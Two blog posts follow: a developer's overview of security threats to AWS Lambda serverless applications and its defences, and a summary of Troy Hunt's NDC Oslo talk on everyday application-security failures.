Many-faced threats to Serverless security

Threats to the security of our serverless applications take many forms, some are the same old foes we have faced before; some are new; and some have taken on new forms in the serverless world.

As we adopt the serverless paradigm for building cloud-hosted applications, we delegate even more of the operational responsibilities to our cloud providers. When you build a serverless architecture around AWS Lambda you no longer have to configure AMIs, patch the OS, and install daemons to collect and distribute logs and metrics for your application. AWS takes care all of that for you.

What does this mean for the Shared Responsibility Model that has long been the cornerstone of security in the AWS cloud?

Protection from attacks against the OS

AWS takes over the responsibility for maintaining the host OS as part of their core competency. Hence alleviating you from the rigorous task of applying all the latest security patches – something most of us just don’t do a good enough job of as it’s not our primary focus.

In doing so, it protects us from attacks against known vulnerabilities in the OS and prevents attacks such as WannaCry.

Also, by removing long lived servers from the picture we also removed the threats posed by compromised servers that live in our environment for a long time.

WannaCry happened because the MS17–017 security patch was not applied to the affected hosts.

WannaCry happened because the MS17–017 security patch was not applied to the affected hosts.

However, it is still our responsibility to patch our application and address vulnerabilities that exist in our code and our dependencies.

OWASP top 10 is still as relevant as ever

Aside from a few reclassifications the OWASP top 10 list has largely stayed the same in 7 years.

Aside from a few reclassifications the OWASP top 10 list has largely stayed the same in 7 years.

A glance at the OWASP top 10 list for 2017 shows us some familiar threats – Injection, Cross-Site Scripting, Sensitive Data Exposure, and so on.

A9 – Components with Known Vulnerabilities

When the folks at Snyk looked at a dataset of 1792 data breaches in 2016 they found that 12 of the top 50 data breaches were caused by applications using components with known vulnerabilities.

Furthermore, 77% of the top 5000 URLs from Alexa include at least one vulnerable library. This is less surprising than it first sound when you consider that some of the most popular front-end js frameworks – eg. jquery, Angular and React – all had known vulnerabilities. It highlights the need to continuously update and patch your dependencies.

However, unlike OS patches which are standalone, trusted and easy to apply, security updates to these 3rd party dependencies are usually bundled with feature and API changes that need to be integrated and tested. It makes our life as developers difficult and it’s yet another thing we gotta do when we’re working overtime to ship new features.

And then there’s the matter of transient dependencies, and boy there are so many of them… If these transient dependencies have vulnerabilities then you too are vulnerable through your direct dependencies.

https://david-dm.org/request/request?view=tree

https://david-dm.org/request/request?view=tree

Finding vulnerabilities in our dependencies is hard work and requires constant diligence, which is why services such as Snyk is so useful. It even comes with a built-in integration with Lambda too!

Attacks against NPM publishers

What if the author/publisher of your 3rd party dependency is not who you think they are?

What if the author/publisher of your 3rd party dependency is not who you think they are?

Just a few weeks ago, a security bounty hunter posted this amazing thread on how he managed to gain direct push rights to 14% of NPM packages. The list of affected packages include some big names too: debug, request, react, co, express, moment, gulp, mongoose, mysql, bower, browserify, electron, jasmine, cheerio, modernizr, redux and many more. In total, these packages account for 20% of the total number of monthly downloads from NPM.

Let that sink in for a moment.

Did he use highly sophisticated methods to circumvent NPM’s security?

Nope, it was a combination of brute force and using known account & credential leaks from a number of sources including Github. In other words, anyone could have pulled these off with very little research.

It’s hard not to feel let down by these package authors when so many display such a cavalier attitude towards securing access to their NPM accounts. I feel my trust in these 3rd party dependencies have been betrayed.

662 users had password «123456», 174 – «123», 124 – «password».

1409 users (1%) used their username as their password, in its original form, without any modifications.

11% of users reused their leaked passwords: 10.6% – directly, and 0.7% – with very minor modifications.

As I demonstrated in my recent talk on Serverless security, one can easily steal temporary AWS credentials from affected Lambda functions (or EC2-hosted Node.js applications) with a few lines of code.

Imagine then, a scenario where an attacker had managed to gain push rights to 14% of all NPM packages. He could publish a patch update to all these packages and steal AWS credentials at a massive scale.

The stakes are high and it’s quite possibly the biggest security threat we face in the serverless world; and it’s equally threatening to applications hosted in containers or VMs.

The problems and risks with package management is not specific to the Node.js ecosystem. I have spent most of my career working with .Net technologies and am now working with Scala at Space Ape Games, package management has been a challenge everywhere. Whether or not you’re talking about Nuget or Maven, or whatever package repository, you’re always at risk if the authors of your dependencies do not exercise the same due diligence to secure their accounts as they would their own applications.

Or, perhaps they do…

A1 – Injection & A3 – XSS

SQL injection and other forms of injection attacks are still possible in the serverless world, as are cross-site scripting attacks.

Even if you’re using NoSQL databases you might not be exempt from injection attacks either. MongoDB for instance, exposes a number of attack vectors through its query APIs.

Arguably DynamoDB’s API makes it hard (at least I haven’t heard of a way yet) for an attacker to orchestrate an injection attack, but you’re still open to other forms of exploits – eg. XSS, and leaked credentials which grants attacker access to DynamoDB tables.

Nonetheless, you should always sanitize user inputs, as well as the output from your Lambda functions.

A6 – Sensitive Data Exposure

Along with servers, web frameworks also disappeared when one migrates to the serverless paradigm. These web frameworks have served us well for many years, but they also handed us a loaded gun we can shot ourselves in the foot with.

As Troy Hunt demonstrated at a recent talk at the LDNUG, we can accidentally expose all kinds of sensitive data by accidentally leaving directory listing options ON. From web.config containing credentials (at 35:28) to SQL backups files (at 1:17:28)!

With API Gateway and Lambda, accidental exposures like this become very unlikely – directory listing is a “feature” you’d have to implement yourself. It forces you to make very conscious decisions about when to support directory listing and the answer is probably never.

IAM

If your Lambda functions are compromised, then the next line of defence is to restrict what these compromised functions can do.

This is why you need to apply the Least Privilege Principle when configuring Lambda permissions.

In the Serverless framework, the default behaviour is to use the same IAM role for all functions in the service.

However, the serverless.yml spec allows you to specify a different IAM role per function. Although as you can see from the examples it involves a lot more development effort and (from my experience) adds enough friction that almost no one does this…

Apply per-function IAM policies.

Apply per-function IAM policies.

IAM policy not versioned with Lambda

A shortcoming with the current Lambda + IAM configuration is that IAM policies are not versioned along with the Lambda function.

In the scenario where you have multiple versions of the same function in active use (perhaps with different aliases), then it becomes problematic to add or remove permissions:

  • adding a new permission to a new version of the function allows old versions of the function additional access that they don’t require (and poses a vulnerability)
  • removing an existing permission from a new version of the function can break old versions of the function that still require that permission

Since the 1.0 release of the Serverless framework this has become less a problem as it no longer use aliases for stages – instead, each stage is deployed as a separate function, eg.

  • service-function-dev
  • service-function-staging
  • service-function-prod

which means it’s far less likely that you’ll need to have multiple versions of the same function in active use.

I also found (from personal experience) account level isolation can help mitigate the problems of adding/removing permissions, and crucially, the isolation also helps compartmentalise security breaches – eg. a compromised function running in a non-production account cannot be used to cause harm in the production account and impact your users.

We can apply the same idea of bulkheads (which has been popularised in the microservices world by Michael Nygard’s “Release It”) and compartmentalise security breaches at an account level.

We can apply the same idea of bulkheads (which has been popularised in the microservices world by Michael Nygard’s “Release It”) and compartmentalise security breaches at an account level.

Delete unused functions

One of the benefits of the serverless paradigm is that you don’t pay for functions when they’re not used.

The flip side of this property is that you have less need to remove unused functions since they don’t show up on your bill. However, these functions still exist as attack surface, even more so than actively used functions because they’re less likely to be updated and patched. Over time, these unused functions can become a hotbed for components with known vulnerabilities that attackers can exploit.

Lambda’s documentations also cites this as one of the best practices.

Delete old Lambda functions that you are no longer using.

The changing face of DoS attacks

With AWS Lambda you are far more likely to scale your way out of a DoS attack. However, scaling your serverless architecture aggressively to fight a DoS attack with brute force has a significant cost implication.

No wonder people started calling DoS attacks against serverless applications Denial of Wallet (DoW) attacks!

“But you can just throttle the no. of concurrent invocations, right?”

Sure, and you end up with a DoS problem instead… it’s a lose-lose situation.

AWS recently introduced AWS Shield but at the time of writing the payment protection (only if you pay a monthly flat fee for AWS Shield Advanced) does not cover Lambda costs incurred during a DoS attack.

For a monthly flat fee, AWS Shield Advanced gives you cost protection in the event of a DoS attack, but that protection does not cover Lambda yet.

For a monthly flat fee, AWS Shield Advanced gives you cost protection in the event of a DoS attack, but that protection does not cover Lambda yet.

Also, Lambda has an at-least-once invocation policy. According to the folks at SunGard, this can result in up to 3 (successful) invocations. From the article, the reported rate of multiple invocations is extremely low – 0.02% – but one wonders if the rate is tied to the load and might manifest itself at a much higher rate during a DoS attack.

Taken from the “Run, Lambda, Run” article below.

Taken from the “Run, Lambda, Run” article mentioned above.

Furthermore, you need to consider how Lambda retries failed invocations by an asynchronous source – eg. S3, SNS, SES, CloudWatch Events, etc. Officially, these invocations are retried twice before they’re sent to the assigned DLQ (if any).

However, an analysis by the OpsGenie guys showed that the no. of retries are not carved in stone and can go up to as many as 6 before the invocation is sent to the DLQ.

If the DoS attacker is able to trigger failed async invocations (perhaps by uploading files to S3 that will cause your function to except when attempting to process) then they can significantly magnify the impact of their attack.

All these add up to the potential for the actual no. of Lambda invocations to explode during a DoS attack. As we discussed earlier, whilst your infrastructure might be able to handle the attack, can your wallet stretch to the same extend? Should you allow it to?

Securing external data

Just a handful of the places you could be storing state outside of your stateless Lambda function.

Just a handful of the places you could be storing state outside of your stateless Lambda function.

Due to the ephemeral nature of Lambda functions, chances are all of your functions are stateless. More than ever, states are stored in external systems and we need to secure them both at rest and in-transit.

Communication to all AWS services are via HTTPS and every request needs to be signed and authenticated. A handful of AWS services also offer server-side encryption for your data at rest – S3, RDS and Kinesis streams springs to mind, and Lambda has built-in integration with KMS to encrypt your functions’ environment variables.

The same diligence needs to be applied when storing sensitive data in services/DBs that do not offer built-in encryption – eg. DynamoDB, Elasticsearch, etc. – and ensure they’re protected at rest. In the case of a data breach, it provides another layer of protection for our users’ data.

We owe our users that much.

Use secure transport when transmitting data to and from services (both external and internal ones). If you’re building APIs with API Gateway and Lambda then you’re forced to use HTTPS by default, which is a good thing. However, API Gateway is always publicly accessible and you need to take the necessary precautions to secure access to internal APIs.

You can use API keys but I think it’s better to use IAM roles. It gives you fine grained control over who can invoke which actions on which resources. Also, using IAM roles spares you from awkward conversations like this:

“It’s X’s last day, he probably has our API keys on his laptop somewhere, should we rotate the API keys just in case?”

“mm.. that’d be a lot of work, X is trustworthy, he’s not gonna do anything.”

“ok… if you say so… (secretly pray X doesn’t lose his laptop or develop a belated grudge against the company)”

Fortunately, both can be easily configured using the Serverless framework.

Leaked credentials

Don’t become an unwilling bitcoin miner.

Don’t become an unwilling bitcoin miner.

The internet is full of horror stories of developers racking up a massive AWS bill after their leaked credentials are used by cyber-criminals to mine bitcoins. For every such story many more would have been affected but choose to be silent (for the same reason many security breaches are not announced publicly as big companies do not want to appear incompetent).

Even within my small social circle (*sobs) I have heard 2 such incidents, neither were made public and both resulted in over $100k worth of damages. Fortunately, in both cases AWS agreed to cover the cost.

I know for a fact that AWS actively scan public Github repos for active AWS credentials and try to alert you as soon as possible. But as some of the above stories mentioned, even if your credentials were leaked only for a brief window of time it will not escape the watchful gaze of attackers. (plus, they still exist in git commit history unless you rewrite the history too, best to deactivate the credentials if possible).

A good approach to prevent AWS credential leaks is to use git pre-commit hooks as outlined by this post.

Conclusions

We looked at a number of security threats to our serverless applications in this post, many of them are the same threats that have plighted the software industry for years. All of the OWASP top 10 still apply to us, including SQL, NoSQL and other forms of injection attacks.

Leaked AWS credentials remain a major issue and can potentially impact any organisation that uses AWS. Whilst there are quite a few publicly reported incidents, I have a strong feeling that the actual no. of incidents are much much higher.

We are still responsible for securing our users’ data both at rest as well as in-transit. API Gateway is always publicly accessible, so we need to take the necessary precautions to secure access to our internal APIs, preferably with IAM roles. IAM offers fine grained control over who can invoke which actions on your API resources, and make it easy to manage access when employees come and go.

On a positive note, having AWS take over the responsibility for the security of the host OS gives us a no. of security benefits:

  • protection against OS attacks because AWS can do a much better job of patching known vulnerabilities in the OS
  • host OS are ephemeral which means no long-lived compromised servers
  • it’s much harder to accidentally leave sensitive data exposed by forgetting to turn off directory listing options in a web framework – because you no longer need such web frameworks!

DoS attacks have taken a new form in the serverless world. Whilst you’re probably able to scale your way out of an attack, it’ll still hurt you in the wallet, hence why DoS attacks have become known in the serverless world as Denial of Wallet attacks. Lambda costs incurred during a DoS attack is not covered by AWS Shield Advanced at the time of writing, but hopefully they will be in the near future.

Meanwhile, some new attack surfaces have emerged with AWS Lambda:

  • functions are often given too much permission because they’re not given individual IAM policies tailored to their needs, a compromised function can therefore do more harm than it might otherwise
  • unused functions are often left around for a long time as there is no cost associated with them, but attackers might be able to exploit them especially if they’re not actively maintained and therefore are likely to contain known vulnerabilities

Above all, the most worrisome threat for me are attacks against the package authors themselves. It has been shown that many authors do not take the security of their accounts seriously, and as such endangers themselves as well as the rest of the community that depends on them. It’s impossible to guard against such attacks and erodes one of the strongest aspect of any software ecosystem – the community behind it.

Once again, people have proven to be the weakest link in the security chain.

Slides for my serverless security talk

NDC Oslo 15 – Takeaways from “50 Shades of AppSec”

This year’s version of NDC Oslo has a strong security theme throughout,and one of Troy Hunt’s talks – 50 Shades of AppSec – was one of the top-rated talks at the conference based on attendee feedbacks.

Sadly I missed the talk whilst at the conference but having just watched it on Vimeo it left me amused and scared in equal measures, and wondering if I should ever trust anyone with my personal information ever again…

 

Troy started by talking about the democratisation of hacking, that anybody can become a hacker nowadays, e.g.:

  • a 5-year boy that hacked the XBox;
  • Chrome extension such as Bishop that scans websites for vulnerability as you browse;
  • online tutorials on how to find a site with SQL Injection risk and paste a link into tools like Havij to download its data;
  • or you can go to hackerlist and hire someone to hack for you

The fact that hacking is so accessible these days has given rise to the culture of hacktivism.

image

When it comes to hacktivism, besides the kids (or young adults) you keep hearing about on the news, there’s a darker side to the story – criminal hacking.

Criminals are now taking blackmailing and extortion to the digital age and demanding bitcoins to:

  • remove your (supposedly compromised) data from the internet;
  • to expose more (supposedly compromised) data;
  • stop them from compromising a business’ reputation and online presence

And it’s not just your computer that’s at risk – routers can be hacked to initiate spoof attacks too. This is why encryption and HTTPS is so important.

 

The good news is that even smart criminals are still fallible and sometimes they get tripped up by the simplest things.

For example, Ross Ulbricht (creator of Silk Road) was caught partially because he used his real name on Stack Overflow where he posted a question on how to connect to a hidden Tor site using curl.

Or how Jihadi John was identified because he used his UK student ID to qualify for a discount on a Web Development software, that he was trying to purchase from a computer in Syria with a Syrian IP address.

 

Are we developers making it too easy for  criminals? Judging by the horror examples (which, ok, might be a bit extreme) Troy demonstrated, perhaps we are.

From the horrifyingly obvious…

image

image

image

to perhaps something a bit more subtle (anyone who knows your email and DOB could reset your betfair password, until they fixed it after Troy wrote a post about it)…

image

 

Sometimes we also make it too easy for our users to be insecure. Again, from the obvious…

image

image

To something more subtle (the following makes you wonder if passwords are visible in plain text to a human operator who is offended by certain words)…

image

 

Notice that a recurring theme seems to be this tension between security and usability – e.g. how to make login and password recovery simpler.

 

Perhaps the problem is that we’re not educating developers correctly.

For instance, how is it that in 2015 we’re still teaching developers to do password reset like this and leaving them wide open to SQL Injection attacks?

image

or that base 64 encoding and ROT13 (or 5 in this case..) is a sufficient form of encryption…

image

image

 

But it’s not just the developers that are at fault, sometimes even security auditors are accountable too.

image

 

And of course, let’s not forget the users.

For example, you might not want to have your passwords broadcasted on national TV…

image

image

 

But we are also at fault for giving mixed messages to our users.

For example, why would a QR code scanner need access to your calendar and contacts? But with the design of this UI, all the user will see is the big green ACCEPT button that stands in the way of getting done what they need to do.

image

And social media is particularly bad when it comes to giving confusing messages.

Sometimes they aren’t even trying…

image

other times they make up things such as “security certificates” and throw scary words like “brute force attack” at users (how you are left open to one if you allow people to paste passwords in the text box is beyond me)…

image

and sometimes we leave users vulnerable to criminals (e.g. what if a criminal were to look for similar responses on EE’s twitter account and then contact these users from a legitimate looking account such as @EE_CustomerService with the same EE logo)…

image

 

And you can’t talk about security without talking about governments and surveillance (and Bruce Schneier talked about this in great detail in his opening keynote too).

For example, the US government has technology that can wiretap your VGA cable and see exactly what’s on your monitor.

image

Snowden’s leaks also showed that the US government was looking at Google’s infrastructure to find opportunities where they can siphon up all your data.

image

And UK’s prime minister David Cameron was recently calling for an end to any form of digital communication that cannot be intercepted by the government’s intelligence agencies!

image

 

Finally, appsec gets really interesting when it intersects with the physical world.

For example, when we blindly apply practices in the digital world in the physical world, sometimes we forget simple truths about this world such as letters are delivered in envelops with large windows on them…

image

and the physical world has a way of circumventing security measures designed for the digital world…

image

 

As the digital and physical become ever more intertwined in IoT, security is going to be very interesting.

For example, a vulnerability was found in LIFX light bulbs which leaked credentials for the wireless network, allowing an attacker to compromise your home network.

Whilst LIFX has since fixed the vulnerability, the concern remains that any wifi-connected devices is ultimately vulnerable and may be hacked.

How do we educate developers to defend against these attacks when so many of them are start ups in a hurry to hit the market just to survive? How do we detect these vulnerabilities and investigate them? If your network is compromised would you look to your light bulb as the entry point of the attack?

There are many questions we don’t even know to ask yet…

As for the users, if they’re struggling with keeping their passwords under control, how do we begin to educate them on the dangers they’re exposing themselves to when they purchase these “smart” house appliances?

 

For anyone who has played Watch Dogs, remember at the end of the game Aiden Pearce kills Lucky Quinn by hacking his Pacemaker? This is the reality of the world that we are headed, and these kind of risks will be (are?) very real and would impact all of us. Based on the evidence Troy has shown, it’s a world that many of us are not ready for…

 

 

Links